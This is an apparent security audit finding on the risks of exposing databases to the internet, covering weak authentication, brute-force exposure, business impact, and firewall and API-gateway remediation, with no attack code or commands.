Context
Internet exposition of databases is insecure in its design:
-
Authentication via username/password is weak and subject to brute force attacks and password spraying. Double authentification method is complex to implement.
-
Some database support encryption on communications, most do not and are vulnerable to communication interception.
-
Deny Of Service(DoS) attacks are easy to perform.
-
User management is difficult, most companies use only one user for login to the database.
-
Patch updates are not trivial to install.
Impacted Assets
The data stored in the database, and possibly the underlying server.
In the case the attacker manages to guess a password and take access the database, it can then access to the data stored and possibly gain access to the server hosting the database.
Exploit or command to run
Database protocol bruteforce script is easy to develop.
The hard part is guessing the combination of user / password to login.
Depending on the database type, default account often exists such as mysql or postgresql.
Consequences
Cyber-terms
Direct impact on the confidentiality, integrity ,disponibility and tracability of the information stored in the database.
Managerial terms
Successful login leads to non direct losses to the company as backups needs to be deployed in order to retrieve lost or modified data.
Remediation
Short term
We recommend in short-term to setup a firewall to whitelist the IP adresses authorized to connect the database.
Mid-term
Database access needs to be forwarded from a public API.
The API connects, preferably through a WAF, back to the database. The API can grant tokens that have particular rights (database views) and access time. These are easily revoked and your database is much more secure when rightly configured.
The API can be easily secured with TLS, whitelisting, MFA and other controls such as locking someone out after a number of failed attempts